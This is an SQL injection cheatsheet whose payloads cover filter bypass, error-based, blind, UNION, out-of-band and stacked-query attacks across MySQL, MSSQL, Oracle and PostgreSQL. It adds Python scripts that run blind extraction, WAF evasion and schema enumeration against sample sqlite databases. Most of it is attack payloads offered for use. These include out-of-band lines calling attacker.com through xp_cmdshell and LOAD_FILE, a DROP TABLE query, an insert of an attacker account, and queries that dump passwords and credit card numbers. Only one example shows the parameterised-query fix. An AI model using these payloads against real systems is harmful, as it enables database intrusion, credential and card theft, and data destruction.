SQLi Cheatsheet

WAF or code bypass

SELECT * FROM users WHERE username=CHAR(97,100,109,105,110) -- : admin, spelled out as code points, so the literal string never appears in the request and no quote character is needed (multi-argument CHAR() is MySQL syntax; MSSQL's CHAR() takes a single value)

A trailing space also works, so querying for 'admin ' returns the admin row: MySQL's PAD SPACE collations (the defaults before 8.0, such as utf8mb4_general_ci and utf8mb4_unicode_ci) ignore trailing spaces in comparisons, while a filter matching the exact string admin does not fire. MySQL 8.0's default utf8mb4_0900_ai_ci is NO PAD, so check the collation first.

Error-Based SQLi

Used when database error messages reach the response: the payload forces an error whose text carries the value you want.

' AND 1=CONVERT(int,(SELECT @@version))--  : MSSQL; the failed conversion error quotes the version string
' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--  : MySQL; the XPath error echoes its argument, and 0x7e (~) marks where the leaked value starts and ends
' AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)--  : MySQL; same trick. Both XPath errors show at most 32 characters, so pull longer values in slices

Time-Based Blind SQLi

Used when there's no output or error but you can measure the **response time** to infer data.

' AND IF(1=1, SLEEP(5), 0)--  : MySQL; replace 1=1 with any condition and the 5 s delay becomes its answer
'; WAITFOR DELAY '0:0:5'--  : MSSQL; stacked, so it needs a driver that runs multiple statements
' OR IF(ASCII(SUBSTRING(user(),1,1))>80, SLEEP(5), 0)--  : MySQL; one yes/no question per request about the first character of user(). Comparing against the midpoint of the remaining range each time (binary search) costs about 7 requests per character instead of walking the alphabet
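The inference loop behind the last payload, as an added example that is not part of the original cheatsheet. It runs against an in-memory sqlite database with constructed data standing in for the MySQL back end, and uses a boolean channel (row returned or not) instead of SLEEP(): the binary search is the same for time-based blind SQLi, only the oracle changes to a response-time measurement. sqlite's unicode(substr()) and sqlite_version() are used in place of ASCII(SUBSTRING()) and user(), and the vulnerable login function is a hypothetical target written for this example.

```python
import sqlite3

# Constructed in-memory target (sqlite standing in for the MySQL back end; sample data).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('guest', 'guest')")

QUESTIONS = []   # every condition sent, to count the cost of an extraction


def vulnerable_login(username):
    """Deliberately vulnerable: input spliced into the statement. The caller learns
    only whether a row came back. That is the boolean channel; the time-based
    payloads above get the same bit from a SLEEP() delay instead."""
    sql = f"SELECT 1 FROM users WHERE username='{username}'"
    return conn.execute(sql).fetchone() is not None


def oracle(condition):
    """Ask the application one yes/no question about the database."""
    QUESTIONS.append(condition)
    return vulnerable_login(f"guest' AND ({condition})--")


def search_smallest(ask_greater_than, lo, hi):
    """Binary search: ask_greater_than(mid) answers 'value > mid?'; returns value.
    Halving the range costs about log2(hi - lo) questions instead of hi - lo."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask_greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_length(expr, max_len=64):
    """Length of expr, assuming it is at most max_len characters."""
    return search_smallest(lambda n: oracle(f"length({expr}) > {n}"), 0, max_len)


def blind_char(expr, pos):
    """Code point of the character at 1-based position pos (7 questions for ASCII).
    sqlite's unicode(substr()) plays the role of MySQL's ASCII(SUBSTRING())."""
    return chr(search_smallest(
        lambda c: oracle(f"unicode(substr({expr},{pos},1)) > {c}"), 0, 127))


def extract_blind(expr):
    """Pull the full value of a SQL expression through the yes/no channel."""
    n = blind_length(expr)
    return "".join(blind_char(expr, i) for i in range(1, n + 1))


def ground_truth(expr):
    """Direct query, only for checking the extraction against the real value."""
    return conn.execute(f"SELECT {expr}").fetchone()[0]


if __name__ == "__main__":
    version = extract_blind("sqlite_version()")      # stands in for user()/version()
    pw = extract_blind("(SELECT password FROM users WHERE username='guest')")
    print(version, pw, "questions asked:", len(QUESTIONS))
```

Each character costs seven questions and the length six, so a five-character value takes 41 requests; with a real time-based oracle each of those requests also costs the chosen delay, which is why the delay is kept as short as the network jitter allows.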

UNION-Based SQLi

Used when the application renders query results. UNION appends the rows of your own SELECT to the application's result set, which is the quickest way to pull whole tables. Your SELECT must have the same number of columns as the original query, with compatible types per column; NULL satisfies any type, which is why it is used for the count check.

' UNION SELECT NULL,NULL,NULL--  : column count check; add or remove NULLs until the query stops erroring
' UNION SELECT user(), database(), version()--  : MySQL; once the width is known, put the values you want in the columns the page displays

Bypasses & Encoding Tricks

Helps bypass simple WAFs or input filters. Encodings, whitespace substitutes, and inline comments evade naive protections that pattern-match on spaces, keywords or quotes, because the database tokenizer still sees the same statement.

'/**/OR/**/1=1--  : inline comments replace the spaces a filter keys on
' OR 1=1--+  : in a URL the + decodes to a space, satisfying MySQL's rule that -- must be followed by whitespace
CHAR(65)+CHAR(66)+CHAR(67)  : MSSQL string concatenation builds 'ABC' without a quote character (MySQL: CHAR(65,66,67))
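Why the comment and CHAR() tricks in this section and in "WAF or code bypass" above work, and what actually closes the hole, as an added example that is not from the original cheatsheet. The blocklist WAF is hypothetical, the users table and payloads are constructed, and sqlite stands in for the back end (its CHAR() accepts a list of code points like MySQL's). The trailing-space variant depends on MySQL collation behaviour and is not reproducible in sqlite, so it is not included.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the target's users table (sample data, not real).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "admin", "s3cret"), (2, "guest", "guest")])

# Hypothetical naive blocklist WAF: rejects the protected account name, the
# keyword OR when surrounded by whitespace, and UNION. It does not look inside
# SQL comments and cannot see strings that only exist once the database runs CHAR().
BLOCKLIST = re.compile(r"\badmin\b|\s+or\s+|\bunion\b", re.IGNORECASE)


def waf_allows(user_input):
    """True when the blocklist matches nothing in the raw input."""
    return BLOCKLIST.search(user_input) is None


def vulnerable_lookup(username):
    """Deliberately vulnerable: the input is spliced into the statement text."""
    sql = f"SELECT username FROM users WHERE username='{username}'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(username):
    """Hardened form: a bound parameter can only ever be a string value, so the
    same payload is compared against usernames as text and matches nothing."""
    return [row[0] for row in conn.execute(
        "SELECT username FROM users WHERE username=?", (username,))]


def probe(payload):
    """Send one payload through the WAF and, if it passes, into the vulnerable query.
    Returns (waf_allowed, usernames_returned)."""
    if not waf_allows(payload):
        return False, []
    return True, vulnerable_lookup(payload)


# Constructed payloads, one per filter rule being evaded.
PAYLOADS = {
    "literal":  "admin",                                          # blocked: account name
    "spaces":   "' OR 1=1--",                                      # blocked: " OR "
    "comments": "'/**/OR/**/1=1--",                                # /**/ stands in for the spaces
    "char":     "'/**/OR/**/username=CHAR(97,100,109,105,110)--",  # CHAR() spells admin without the literal
}

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        allowed, rows = probe(payload)
        print(f"{name:9} waf_allowed={allowed!s:5} rows={rows}")
    print("parameterised:", safe_lookup(PAYLOADS["char"]))
```

The filter stops the two obvious payloads and lets both rewritten ones through to the database, which returns the admin row; the parameterised query returns nothing for the same input, because the attacker's text is a value and never becomes part of the statement.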

Out-Of-Band (OOB) SQLi

Useful when neither results nor errors come back and timing is unreliable. The database is made to contact a system you control, typically by DNS lookup, HTTP request or SMB connection, and the value travels inside that request (for DNS, as a label of the looked-up hostname).

'; EXEC xp_cmdshell 'nslookup attacker.com'--  : MSSQL; xp_cmdshell is disabled by default and enabling it through sp_configure needs sysadmin
' UNION SELECT LOAD_FILE('\\\\attacker.com\\data.txt')--  : MySQL on Windows; the server opens an SMB connection to attacker.com to fetch the UNC path, and LOAD_FILE() requires the FILE privilege

Database-Specific Payloads

MySQL

' UNION SELECT user(), database(), version()-- 
' AND sleep(5)-- 
' AND updatexml(1,concat(0x7e,(SELECT @@datadir),0x7e),1)-- : leaks the data directory path through the XPath error

Microsoft SQL Server (MSSQL)

'; EXEC xp_cmdshell 'dir'-- 
'; WAITFOR DELAY '00:00:05'-- 
' UNION SELECT @@version-- 

Oracle

' AND 1=UTL_INADDR.GET_HOST_ADDRESS('attacker.com')--  : OOB DNS lookup; needs the package to be reachable (network ACLs restrict it from 11g on) and outbound name resolution to work
' AND 1=(SELECT banner FROM v$version WHERE ROWNUM=1)--  : comparing the banner with a number raises a conversion error; the statement parsing at all confirms v$version exists, i.e. Oracle. Oracle UNION SELECTs of constant values also need FROM dual

PostgreSQL

' AND (SELECT pg_sleep(5))-- 
' UNION SELECT version(), current_database(), user--  : user is a keyword here, no parentheses

Logical & Stacked Queries

Stacked queries (multiple statements separated by `;`) can allow direct control over DB structure, not just reads. They work only if the whole path permits multiple statements per request: the DBMS (MSSQL and PostgreSQL do; MySQL only when the client enables multi-statements) and the application's driver call (single-statement APIs reject the second statement or never run it).

'; DROP TABLE users;-- 
'; INSERT INTO users VALUES('attacker','pass');-- 
'; UPDATE users SET admin=1 WHERE username='guest';-- 
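The driver-side half of that caveat, as an added example that is not from the original cheatsheet. Python's sqlite3 module exposes both kinds of call on the same in-memory database: execute() refuses a second statement, executescript() runs every statement it is handed. The target tables and the lookup function are constructed for the example; the payload is the DROP TABLE line above.

```python
import sqlite3


def fresh_target():
    """Constructed in-memory target holding the table the payload tries to drop."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
    CREATE TABLE products (name TEXT);
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn


def users_table_survives(conn):
    """Check the catalogue rather than trusting what the attacker saw."""
    return conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='users'"
    ).fetchone()[0] == 1


def attack(multi_statement_api):
    """Deliberately vulnerable lookup hit with the stacked DROP payload through
    either a single-statement call or a multi-statement one."""
    conn = fresh_target()
    payload = "'; DROP TABLE users;--"
    sql = f"SELECT name FROM products WHERE name='{payload}'"
    try:
        if multi_statement_api:
            conn.executescript(sql)   # runs SELECT, then DROP TABLE users
        else:
            conn.execute(sql)         # raises: only one statement allowed
    except (sqlite3.Error, sqlite3.Warning):
        pass   # single-statement API rejected the stacked query; nothing ran
    return users_table_survives(conn)


if __name__ == "__main__":
    print("single-statement API, users survives:", attack(False))
    print("multi-statement API,  users survives:", attack(True))
```

The same payload is harmless through one entry point and destructive through the other, so when a stacked payload appears to do nothing, the DBMS may still be perfectly willing; it is the application's driver call that is in the way, and a different endpoint of the same application may use a different one.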

Tips & Practical Usage

SQLi Cheatsheet: Extracting Database Structure

Step 1: Determine DBMS

Each RDBMS uses different schema metadata tables. Detect DB type via version string or function support.

' UNION SELECT @@version--         : MSSQL (MySQL also accepts @@version)
' UNION SELECT version()--         : MySQL and PostgreSQL
' AND (SELECT banner FROM v$version WHERE ROWNUM=1) LIKE '%Oracle%'--  : Oracle; true only if v$version exists and its banner names Oracle

Step 2: Determine Column Count

Used to prepare for UNION SELECT. Find how many columns the original query returns by raising the ORDER BY index until the server errors: the last index that works is the column count. Then confirm with a UNION of that many NULLs.

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10--    : the first index that errors bounds the count
' UNION SELECT NULL,NULL,NULL--    : confirmation, three columns in this case

Step 3: Enumerate Tables

Once UNION is working, dump table names from metadata tables.

MySQL

' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema=database()--  : table_schema=database() limits the list to the current database

MSSQL

' UNION SELECT name,NULL FROM sysobjects WHERE xtype='U'--      : legacy catalogue view; xtype='U' selects user tables
' UNION SELECT table_name,NULL FROM information_schema.tables--  : standard view, works on MSSQL 2005 and later

PostgreSQL

' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema='public'--

Oracle

' UNION SELECT table_name,NULL FROM all_tables WHERE ROWNUM <= 10--  : all_tables lists the tables the current user can see; ROWNUM keeps the result short

Step 4: Enumerate Columns for a Table

After identifying a table, use this to extract column names.

MySQL

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

MSSQL

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

PostgreSQL

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

Oracle

' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name='USERS'--  : Oracle stores unquoted identifiers in upper case, so match 'USERS'

Step 5: Dump Data from Found Tables

' UNION SELECT username, password FROM users--  : column names from Step 4; the width must still match the original query, pad with NULL if needed
' UNION SELECT email, credit_card FROM customers--

Tips for Schema Inference

Fuzzing Table/Column Names

' AND EXISTS(SELECT * FROM users)--    : guess table names; a missing table errors (or changes the response), an existing one, even an empty one, leaves the page as it was
' AND EXISTS(SELECT username FROM users)--  : the same for column names
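Steps 2 to 5 and the EXISTS() probe run end to end, as an added example that is not from the original cheatsheet. The target is an in-memory sqlite database with constructed tables, and sqlite's own catalogue stands in for the metadata views listed above: sqlite_master for information_schema.tables and the pragma_table_info() table-valued function for information_schema.columns. The vulnerable product search is hypothetical; the injection strings are the ones on this page with the metadata source swapped.

```python
import sqlite3

# Constructed in-memory target; sqlite_master and pragma_table_info() stand in for
# information_schema.tables / .columns. Sample data only.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products  (name TEXT, price REAL);
CREATE TABLE users     (id INTEGER, username TEXT, password TEXT);
CREATE TABLE customers (email TEXT, credit_card TEXT);
INSERT INTO products  VALUES ('widget', 9.99), ('gadget', 19.99);
INSERT INTO users     VALUES (1, 'admin', 'P@ss'), (2, 'guest', 'guest');
INSERT INTO customers VALUES ('a@example.com', '4111111111111111');
""")


def search(q):
    """Deliberately vulnerable product search. Returns (rows, error): the two
    signals, result rows or an error message, that the steps above rely on."""
    sql = f"SELECT name, price FROM products WHERE name='{q}'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.OperationalError as e:
        return [], str(e)


def column_count(limit=20):
    """Step 2: raise ORDER BY n until the server errors; the last n that worked is the count."""
    n = 0
    while n < limit and search(f"' ORDER BY {n + 1}--")[1] is None:
        n += 1
    return n


def union_rows(select_list, source, width):
    """Inject a UNION SELECT of the right width (spare columns padded with NULL)
    and return the rows it contributes, sorted for stable output."""
    cols = select_list + ["NULL"] * (width - len(select_list))
    rows, err = search(f"' UNION SELECT {','.join(cols)} FROM {source}--")
    if err:
        raise RuntimeError(err)
    return sorted(rows)


def enumerate_tables(width):
    """Step 3, sqlite flavour of 'FROM information_schema.tables'."""
    return [r[0] for r in union_rows(["name"], "sqlite_master WHERE type='table'", width)]


def enumerate_columns(table, width):
    """Step 4, sqlite flavour of 'FROM information_schema.columns WHERE table_name=...'."""
    return [r[0] for r in union_rows(["name"], f"pragma_table_info('{table}')", width)]


def dump(table, columns, width):
    """Step 5: pull the chosen columns out of a table found in Step 3."""
    return union_rows(columns, table, width)


def table_exists(table):
    """Schema-inference tip: EXISTS() on a missing table raises an error,
    on a present one (even an empty one) it does not."""
    return search(f"' AND EXISTS(SELECT * FROM {table})--")[1] is None


if __name__ == "__main__":
    width = column_count()                 # 2 for this search
    for t in enumerate_tables(width):
        print(t, enumerate_columns(t, width))
    print(dump("users", ["username", "password"], width))
    print(table_exists("users"), table_exists("nosuchtable"))
```

Against MySQL, MSSQL or PostgreSQL only the two metadata sources in enumerate_tables() and enumerate_columns() change, to the information_schema queries listed in Steps 3 and 4; the column-count loop, the NULL padding and the EXISTS() probe carry over unchanged.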

Tools & Further Reading